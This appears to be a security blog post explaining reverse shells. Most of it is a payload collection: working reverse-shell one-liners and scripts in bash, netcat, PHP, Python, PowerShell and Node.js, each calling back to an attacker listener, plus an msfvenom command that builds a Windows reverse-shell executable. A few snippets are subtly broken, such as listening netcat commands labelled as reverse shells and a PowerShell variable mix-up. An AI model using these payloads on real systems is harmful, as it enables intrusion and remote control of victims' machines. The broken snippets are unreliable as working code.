Categories:
#security
Tags:
#reverse shells
#bash
#powershell
#php
#python
#node
A shell is an interactive display that lets users submit commands to be executed on their computer. These commands are translated into system calls, which are understood and carried out by the operating system. In essence the shell is the direct window into your computer’s soul. Any function that can be carried out by your computer can be set into motion through shell commands.
A remote shell allows you to interface with a shell instance on your computer over a network. This can be over LAN through a physical cable, a virtual network or the internet. The most common method of creating a remote shell is through an ssh connection to your computer’s IP.
1user=michael
2IP=10.0.0.1
3
4ssh $user@$IPThis command, and others like it, gives you a remote clone of a shell that is running on the target computer. This function gives users the freedom to connect and work on their computer remotely from any device in the world, with the same freedom they would have if they were physically infront of their device.
However with increased control comes increased risk and vulnerability. If a malicious actor were to gain access to your computer through a remote shell, they would have the same level of control over your computer as you do.
This is where reverse shells come into play.
Reverse shells are a combination of the two concepts above. A reverse shell is a shell that is first opened on the local computer and then hands off control to a remote computer over the network. The attacker will constantly listen and wait for the reverse shell to send them a signal to connect. To do this the reverse shell has to know the IP address of the remote computer and the port it is listening on. The remote computer then has to be set up to accept incoming connections on that port.
If creating a remote shells is like asking to speak to the manager - then a reverse shell is like the manager calling you up because the two of you are friends and he knows you are looking for him.
Reverse shells are a common method of gaining access to a computer remotely. They are often used by attackers to gain access to a target system, but they can also be used for legitimate purposes, such as remote administration or troubleshooting.
Reverse shells are often used in penetration testing and ethical hacking to test the security of a system. They can also be used by system administrators to remotely manage and troubleshoot systems.
The following examples will show you how to create a reverse shell using shells and programming languages that are often installed by default on target systems.
1nc -lvnp 8080This command will set up a listener on the attacker’s computer on port 8080.
-l flag tells netcat to listen for incoming connections-v flag enables verbose mode-n flag tells netcat not to resolve hostnames-p flag specifies the port number to listen on.This is the most basic step of the reverse shell process. The attacker will set up a listener on their system, waiting for the reverse shell from the target system to connect to them.
The simples and most common method of creating a reverse shell is using bash. Bash is a command-line shell is the defacto UNIX shell. This method simply uses tcp socket to write and read commands from an attacker’s IP. This is often the first method that comes to mind when creating a reverse shell.
1bash -i >& /dev/tcp/10.0.0.1/8080 0>&1This command will create a reverse shell using bash.
-i flag tells bash to run in interactive mode>& operator redirects both standard output and standard error to the specified IP address and port0>&1 operator redirects standard input to standard output.This command will connect to the specified IP address and port, allowing the attacker to execute commands on the target system.
Netcat is a powerful networking utility that can be used to create arbitrary remote connections. It is often pre-installed on Linux and macOS systems, making it a popular choice for attackers.
1nc -l 8080 -e /bin/bashThis command will create a reverse shell using netcat.
-l flag tells netcat to listen for incoming connections on port 8080-e flag specifies the program to execute when a connection is made. In this case, it will execute /bin/bash, giving the attacker a shell on the target system.nc command and execute commands on the target system.Bash pipes are a common method of creating reverse shells. Just like in the first example they allow you to redirect the output of one command to the input of another command. This can be used to create a reverse shell by redirecting the output of a shell to a netcat network connection.
1mkfifo /tmp/f; nc -lvnp 8080 < /tmp/f | /bin/sh >/tmp/f 2>&1; rm /tmp/fThis command will create a named pipe using the mkfifo command.
nc command will listen for incoming connections on port 8080 and redirect the input from the named pipe to the shell.rm command.PHP is commonly exploited via webshells - files that are uploaded to a web server and executed by the server. This is a common method of gaining access to a target system, as many web servers have PHP installed by default.
1php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'This command will create a reverse shell using PHP.
fsockopen function opens a socket connection to the specified IP address and portexec function executes the specified command, in this case, /bin/sh -i, which gives the attacker a shell on the target system.<&3 operator redirects standard input from the socket>&3 operator redirects standard output to the socket2>&3 operator redirects standard error to the socket.This command will connect to the specified IP address and port, allowing the attacker to execute commands on the target system.
Python has increasingly become a popular language running on many systems. In this example we are using creating a socket connection and redirecting the input and output to the socket. The final command runs the same shell as the previous examples.
1import socket,subprocess,os
2s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
3s.connect(("10.0.0.1",1234))
4os.dup2(s.fileno(),0)
5os.dup2(s.fileno(),1)
6os.dup2(s.fileno(),2)
7p=subprocess.call(["/bin/sh","-i"])This command will create a reverse shell using Python.
socket module is used to create a socket connection to the specified IP address and portsubprocess module is used to execute the specified command, in this case, /bin/sh -i, which gives the attacker a shell on the target system.os.dup2 function redirects standard input, output, and error to the socketsubprocess.call function executes the specified command, giving the attacker a shell on the target system.This command will connect to the specified IP address and port, allowing the attacker to execute commands on the target system.
Powershell is a powerful scripting language that is often used for system administration and automation. It is commonly used in Windows environments, making it a popular choice for attackers.
1$socket=(New-Object Net.Sockets.TCPClient("10.10.17.1",1337)).$stream = $client.GetStream();
2
3[byte[]]$bt=0..255|%{0};
4
5while(($i=$socket.Read($bt,0,$bt.Length)) -ne 0){
6 $d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);
7 $st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1));
8 $socket.Write($st,0,$st.Length);
9 $socket.Flush()
10 }New-Object cmdlet creates a new TCP client and connects to the specified IP address and port$stream variable is used to read and write data to the socketwhile loop reads data from the socket and executes it using the iex cmdlet$socket.Write method.Flush method is used to ensure that all data is sent to the attacker.Node.js is a popular JavaScript runtime and can be leveraged to create a reverse shell. This is similar to how Python and PHP are used to create new network connections.
1// Reverse shell in Node.js
2// Connects back to a remote listener and pipes a shell
3
4const net = require("net");
5const { spawn } = require("child_process");
6
7// CHANGE THESE VALUES
8const REMOTE_HOST = "10.0.0.1";
9const REMOTE_PORT = 4444;
10
11const client = new net.Socket();
12
13client.connect(REMOTE_PORT, REMOTE_HOST, () => {
14 const sh = spawn("/bin/sh", []);
15 client.write("Connected!\n");
16
17 client.pipe(sh.stdin);
18 sh.stdout.pipe(client);
19 sh.stderr.pipe(client);
20
21 sh.on("exit", () => {
22 client.end();
23 });
24});
25
26client.on("error", (err) => {
27 setTimeout(() => {
28 client.connect(REMOTE_PORT, REMOTE_HOST);
29 }, 5000); // retry after 5 seconds
30});This command will create a reverse shell using Node.js.
net module is used to create a socket connection to the specified IP address and portspawn function is used to execute the specified command, in this case, /bin/sh, which gives the attacker a shell on the target system.client.pipe method is used to redirect the input and output of the shell to the socketsh.on("exit") method is used to close the socket when the shell exitsclient.on("error") method is used to retry the connection if there is an error.MSFVenom is a powerful tool that can be used to create reverse complex shells programatically. It is part of the Metasploit Framework and can be used to generate payloads for various platforms.
1msfvenom -p windows/x64/shell/reverse_tcp -f exe -o shell.exe LHOST=10.0.0.1 LPORT=8080-p flag specifies the payload to use, in this case, windows/x64/shell/reverse_tcp-f flag specifies the format of the output file, in this case, exe-o flag specifies the output file name, in this case, shell.exeLHOST and LPORT options specify the IP address and port to connect back to.msfvenom command will generate a reverse shell executable that can be run on the target system.msfconsole command and wait for the reverse shell to connect back to them.There are many resources available online that provide more information about reverse shells and how to use them. Here are a few that I found helpful:
Launching my AI Web Security Lab — Here’s Why I’m Building It
And you don’t need to memorize how binary search works
